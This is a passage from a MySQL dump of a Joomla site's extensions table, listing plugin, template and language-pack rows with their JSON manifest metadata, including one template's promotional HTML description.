00:00:00',0,0),(468,0,'plg_fields_list','plugin','list','fields',0,1,1,0,'{\"name\":\"plg_fields_list\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_LIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"list\"}','','','',0,'0000-00-00 00:00:00',0,0),(469,0,'plg_fields_media','plugin','media','fields',0,1,1,0,'{\"name\":\"plg_fields_media\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','','','',0,'0000-00-00 00:00:00',0,0),(470,0,'plg_fields_radio','plugin','radio','fields',0,1,1,0,'{\"name\":\"plg_fields_radio\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_RADIO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"radio\"}','','','',0,'0000-00-00 00:00:00',0,0),(471,0,'plg_fields_sql','plugin','sql','fields',0,1,1,0,'{\"name\":\"plg_fields_sql\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_SQL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sql\"}','','','',0,'0000-00-00 00:00:00',0,0),(472,0,'plg_fields_text','plugin','text','fields',0,1,1,0,'{\"name\":\"plg_fields_text\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"text\"}','','','',0,'0000-00-00 00:00:00',0,0),(473,0,'plg_fields_textarea','plugin','textarea','fields',0,1,1,0,'{\"name\":\"plg_fields_textarea\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXTAREA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"textarea\"}','','','',0,'0000-00-00 00:00:00',0,0),(474,0,'plg_fields_url','plugin','url','fields',0,1,1,0,'{\"name\":\"plg_fields_url\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_URL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"url\"}','','','',0,'0000-00-00 00:00:00',0,0),(475,0,'plg_fields_user','plugin','user','fields',0,1,1,0,'{\"name\":\"plg_fields_user\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','','','',0,'0000-00-00 00:00:00',0,0),(476,0,'plg_fields_usergrouplist','plugin','usergrouplist','fields',0,1,1,0,'{\"name\":\"plg_fields_usergrouplist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USERGROUPLIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"usergrouplist\"}','','','',0,'0000-00-00 00:00:00',0,0),(477,0,'plg_content_fields','plugin','fields','content',0,1,1,0,'{\"name\":\"plg_content_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_CONTENT_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(478,0,'plg_editors-xtd_fields','plugin','fields','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(479,0,'plg_sampledata_blog','plugin','blog','sampledata',0,0,1,0,'{\"name\":\"plg_sampledata_blog\",\"type\":\"plugin\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"PLG_SAMPLEDATA_BLOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"blog\"}','','','',62,'2019-03-07 14:44:19',0,0),(480,0,'plg_system_sessiongc','plugin','sessiongc','system',0,1,1,0,'{\"name\":\"plg_system_sessiongc\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.6\",\"description\":\"PLG_SYSTEM_SESSIONGC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sessiongc\"}','','','',0,'0000-00-00 00:00:00',8,0),(481,0,'plg_fields_repeatable','plugin','repeatable','fields',0,1,1,0,'{\"name\":\"plg_fields_repeatable\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_FIELDS_REPEATABLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"repeatable\"}','','','',0,'0000-00-00 00:00:00',0,0),(482,0,'plg_content_confirmconsent','plugin','confirmconsent','content',0,0,1,0,'{\"name\":\"plg_content_confirmconsent\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_CONTENT_CONFIRMCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"confirmconsent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(483,0,'PLG_SYSTEM_ACTIONLOGS','plugin','actionlogs','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_ACTIONLOGS\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(484,0,'PLG_ACTIONLOG_JOOMLA','plugin','joomla','actionlog',0,1,1,0,'{\"name\":\"PLG_ACTIONLOG_JOOMLA\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_ACTIONLOG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(485,0,'plg_system_privacyconsent','plugin','privacyconsent','system',0,0,1,0,'{\"name\":\"plg_system_privacyconsent\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_PRIVACYCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacyconsent\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(486,0,'plg_system_logrotation','plugin','logrotation','system',0,1,1,0,'{\"name\":\"plg_system_logrotation\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_LOGROTATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logrotation\"}','{\"lastrun\":1663411483}','','',0,'0000-00-00 00:00:00',3,0),(487,0,'plg_privacy_user','plugin','user','privacy',0,1,1,0,'{\"name\":\"plg_privacy_user\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(488,0,'plg_quickicon_privacycheck','plugin','privacycheck','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_privacycheck\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_QUICKICON_PRIVACYCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacycheck\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(489,0,'plg_user_terms','plugin','terms','user',0,0,1,0,'{\"name\":\"plg_user_terms\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_USER_TERMS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"terms\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(490,0,'plg_privacy_contact','plugin','contact','privacy',0,1,1,0,'{\"name\":\"plg_privacy_contact\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{}','','',62,'2019-05-03 09:45:05',0,0),(491,0,'plg_privacy_content','plugin','content','privacy',0,1,1,0,'{\"name\":\"plg_privacy_content\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(492,0,'plg_privacy_message','plugin','message','privacy',0,1,1,0,'{\"name\":\"plg_privacy_message\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_MESSAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"message\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(493,0,'plg_privacy_actionlogs','plugin','actionlogs','privacy',0,1,1,0,'{\"name\":\"plg_privacy_actionlogs\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(494,0,'plg_captcha_recaptcha_invisible','plugin','recaptcha_invisible','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha_invisible\",\"type\":\"plugin\",\"creationDate\":\"November 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_INVISIBLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha_invisible\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(495,0,'plg_privacy_consents','plugin','consents','privacy',0,1,1,0,'{\"name\":\"plg_privacy_consents\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONSENTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"consents\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(500,0,'atomic','template','atomic','',0,1,1,0,'{\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"2.5.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(502,0,'bluestork','template','bluestork','',1,1,1,0,'{\"name\":\"bluestork\",\"type\":\"template\",\"creationDate\":\"07\\/02\\/09\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"TPL_BLUESTORK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\",\"textBig\":\"0\",\"highContrast\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(503,0,'beez_20','template','beez_20','',0,1,1,0,'{\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,0,'hathor','template','hathor','',1,1,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(505,0,'beez5','template','beez5','',0,1,1,0,'{\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"html5\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(600,802,'English (en-GB)','language','en-GB','',0,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"August 2022\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.11\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,802,'English (en-GB)','language','en-GB','',1,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"August 2022\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.11\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,0,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"August 2022\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2019 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.11\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(801,0,'pkg_weblinks','package','pkg_weblinks','',0,1,1,0,'{\"name\":\"pkg_weblinks\",\"type\":\"package\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PKG_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pkg_weblinks\"}','','','',0,'0000-00-00 00:00:00',0,0),(802,0,'English (en-GB) Language Pack','package','pkg_en-GB','',0,1,1,1,'{\"name\":\"English (en-GB) Language Pack\",\"type\":\"package\",\"creationDate\":\"August 2022\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2019 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.11.1\",\"description\":\"en-GB language pack\",\"group\":\"\",\"filename\":\"pkg_en-GB\"}','','','',0,'0000-00-00 00:00:00',0,0),(10001,0,'gk_ilife_25','template','gk_ilife','',0,1,1,0,'{\"name\":\"gk_ilife_25\",\"type\":\"template\",\"creationDate\":\"25\\/09\\/2008\",\"author\":\"Robert Gavick - GavickPro\",\"copyright\":\"Copyrighted Commercial Software\",\"authorEmail\":\"info@gavick.com\",\"authorUrl\":\"http:\\/\\/www.gavick.com\",\"version\":\"1.0\",\"description\":\"\\n                <style type=\\\"text\\/css\\\" media=\\\"all\\\">\\n                        <!--\\n                        #wrap1 {padding:0px 0px 4px 0px;}\\n                        h1 {clear:both;font-family: Arial Narrow,sans-serif;font-size:18px;margin:0px 0px 12px 0px;padding:0px 0px 1px 10px;color:#C64934;}\\n                        .wrap2 {background:#fff;border:1px solid #8F8F8F;padding: 10px;}\\n                        -->\\n                        <\\/style>\\n                        <div id=\\\"wrap1\\\">\\n                        <h1>ILife - September 08 Joomla Template (for Joomla 1.5)<\\/h1>\\n                         <div class=\\\"wrap2\\\">\\n                        <a title=\\\"Visit the official website!\\\" href=\\\"http:\\/\\/www.gavick.com\\\"> <img style=\\\"padding-left: 10px;float:right; background-color: #fff;border:1px solid #CFCFCF;margin:0px 20px 2px 20px;\\\" src=\\\"..\\/templates\\/gk_ilife\\/images\\/ilife_image.jpg\\\" border=\\\"0\\\" alt=\\\"Logo\\\" \\/><\\/a>Make your jump into another great Gavick template! Be different!... be your self. <br \\/>\\n                       I Life combines extreme action, sudden and slight motion, together to shape ideas, your experiences and special radical sports events.\\nThe innovative colors combinations will place your website in the highest superior quality design.<br \\/><br \\/>\\n\\nPushed to the limit, we are happy to release for the first time, the new and amazing Tabs Manager GK2 component, together with the new TabsMix module, that offers a perfect combination in only one tool, the fantastic and fully realized functions of both TabsArts and TabsMods modules... also, the extra custom code presentation that will totally free yourself for any limitations.<br \\/><br \\/>\\nThe unquestioned quality of PhotoSlide GK2 component and the News Show GK3 module could not be exclude in I Life template. So, once again they make their presence to be those perfect partners in your website.<br \\/>\\n\\nAlso new in town, please welcome the young Gavick Highlighter Module! Use it and abuse it, to scroll your interactive and special news and articles.\\n\\n                        \\n                        \\n                        \\n                        <br \\/><br \\/>\\n                        <strong>An overview of ILife key features:<\\/strong>\\n                        <ul><li>Tableless design and 100% css based<\\/li>\\n                        <li>2 color variations styles (orange \\u2013 blue)<\\/li>\\n                        <li>New version of Tabs Manager GK2 component and the new TabsMix module.<\\/li>\\n\\t\\t\\t<li>New Gavick Highlighter module.<\\/li>\\n                        <li>Build support for the PhotoSlide GK2 component and News Image I module. <\\/li>   \\n                        <li>Build support for the News Show GK3 module with PhotoSlide GK2 plugin.<\\/li>  \\n                        <li>New compressed engine option for both News Image I and News Show GK3 modules.<\\/li>                  \\n                        <li>2 layout options:  2 columns (right+component), 1 column (component)<\\/li>\\n                        <li>All 21 modules are fully collapsible<\\/li>\\n                        <li>Header position width option setting on template configuration<\\/li>\\n                        <li>Impressive built-in content style<\\/li>\\n                        <li>2 built-in menu options - Suckerfish menu and new MooMenu (34 different styles moomenu animation effects, speed menu animation option\\n                        <\\/li> \\n                        <li>Optional IE6 Warning \\/ Upgrade Notification<\\/li>\\n                        <li>Lightweight, modern and very fast-loading design<\\/li>\\n                        <li>Joomla 1.5 Native<\\/li>\\n                        <li>W3C XHTML 1.0 Transitional. W3C CSS Valid<\\/li> \\n                        <li>Fully compatible IE7, Firefox 2+, Firefox 3, Flock 0.7+, Netscape, Safari, Opera 9.5 <\\/li>\\n                        <li>Delivered with source Adobe .PSD. <\\/li>                        \\n                        <li>Delivered with \\\"Quick Start Pack\\\"<\\/li>\\n                        <\\/ul>\\n                        View ILife in <a href=\\\"http:\\/\\/demo.gavick.com\\/index.php?year=2008&month=Sep\\\" target=\\\"_blank\\\">live demo<\\/a>\\n                        <\\/div>\\n                        <\\/div>\\n        \",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10002,0,'ja_purity','template','ja_purity','',0,1,1,0,'{\"legacy\":true,\"name\":\"JA_Purity\",\"type\":\"template\",\"creationDate\":\"12\\/26\\/07\",\"author\":\"JoomlArt.com\",\"copyright\":\"\",\"authorEmail\":\"webmaster@joomlart.com\",\"authorUrl\":\"http:\\/\\/www.joomlart.com\",\"version\":\"1.2.0\",\"description\":\"JA PURITY DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,-1),(10003,0,'rhuk_milkyway','template','rhuk_milkyway','',0,1,1,0,'{\"legacy\":true,\"name\":\"rhuk_milkyway\",\"type\":\"template\",\"creationDate\":\"11\\/20\\/06\",\"author\":\"Andy Miller\",\"copyright\":\"\",\"authorEmail\":\"rhuk@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"1.0.2\",\"description\":\"TPL_RHUK_MILKYWAY\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,-1),(10004,10007,'Russian (ru-RU)','language','ru-RU','',0,1,0,0,'{\"name\":\"Russian (ru-RU)\",\"type\":\"language\",\"creationDate\":\"10.05.2022\",\"author\":\"Russian Translation Team\",\"copyright\":\"Copyright (C) 2005 - 2022 Open Source Matters, Inc.\",\"authorEmail\":\"smart@joomlaportal.ru\",\"authorUrl\":\"https:\\/\\/joomlaportal.ru\",\"version\":\"3.10.9.1\",\"description\":\"<p>Russian language pack (site) for Joomla!<\\/p>\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10005,10007,'Russian (ru-RU)','language','ru-RU','',1,1,0,0,'{\"name\":\"Russian (ru-RU)\",\"type\":\"language\",\"creationDate\":\"10.05.2022\",\"author\":\"Russian Translation Team\",\"copyright\":\"Copyright (C) 2005 - 2022 Open Source Matters, Inc.\",\"authorEmail\":\"smart@joomlaportal.ru\",\"authorUrl\":\"https:\\/\\/joomlaportal.ru\",\"version\":\"3.10.9.1\",\"description\":\"<p>Russian language pack (administrator) for Joomla!<\\/p>\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10006,0,'TinyMCE ru-RU','file','tinymce_ru-ru','',0,1,0,0,'{\"name\":\"TinyMCE ru-RU\",\"type\":\"file\",\"creationDate\":\"2012-06-19\",\"author\":\"Russian Translation Team\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved\",\"authorEmail\":\"smart@joomlaportal.ru\",\"authorUrl\":\"www.joomlaportal.ru\",\"version\":\"3.5.2.1\",\"description\":\"Russian Language Package for TinyMCE 3.5.2.1 in Joomla 2.5\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10007,0,'Russian (ru-RU) Language Pack','package','pkg_ru-RU','',0,1,1,0,'{\"name\":\"Russian (ru-RU) Language Pack\",\"type\":\"package\",\"creationDate\":\"10.05.2022\",\"author\":\"Russian Translation Team\",\"copyright\":\"Copyright (C) 2005 - 2022 Open Source Matters, Inc.\",\"authorEmail\":\"smart@joomlaportal.ru\",\"authorUrl\":\"https:\\/\\/joomlaportal.ru\",\"version\":\"3.10.9.1\",\"description\":\"<div class=\'alert alert-info\' style=\'font-weight: 400\'><h3 style=\'font-weight: 400\'>Joomla 3.10.9 Russian Language Pack<\\/h3><p>\\u041e\\u0444\\u0438\\u0446\\u0438\\u0430\\u043b\\u044c\\u043d\\u0430\\u044f \\u043b\\u043e\\u043a\\u0430\\u043b\\u0438\\u0437\\u0430\\u0446\\u0438\\u044f Joomla, \\u043a\\u043e\\u0442\\u043e\\u0440\\u0430\\u044f \\u043f\\u043e\\u0434\\u0434\\u0435\\u0440\\u0436\\u0438\\u0432\\u0430\\u0435\\u0442\\u0441\\u044f \\u0440\\u0443\\u0441\\u0441\\u043a\\u043e\\u044f\\u0437\\u044b\\u0447\\u043d\\u044b\\u043c \\u0441\\u043e\\u043e\\u0431\\u0449\\u0435\\u0441\\u0442\\u0432\\u043e\\u043c.<br>\\u041c\\u044b \\u0440\\u0430\\u0434\\u044b \\u043f\\u0440\\u0435\\u0434\\u043b\\u043e\\u0436\\u0435\\u043d\\u0438\\u044f\\u043c \\u0438 \\u043f\\u043e\\u043c\\u043e\\u0449\\u0438 \\u0432 \\u043b\\u043e\\u043a\\u0430\\u043b\\u0438\\u0437\\u0430\\u0446\\u0438\\u0438 Joomla! \\u0421\\u043e\\u043e\\u0431\\u0449\\u0438\\u0442\\u044c \\u043e \\u043f\\u0440\\u043e\\u0431\\u043b\\u0435\\u043c\\u0435 \\u0438\\u043b\\u0438 \\u0432\\u043d\\u0435\\u0441\\u0442\\u0438 \\u0438\\u0441\\u043f\\u0440\\u0430\\u0432\\u043b\\u0435\\u043d\\u0438\\u0435 \\u0432\\u044b \\u043c\\u043e\\u0436\\u0435\\u0442\\u0435 \\u043d\\u0430 \\u0441\\u0442\\u0440\\u0430\\u043d\\u0438\\u0446\\u0435 <a 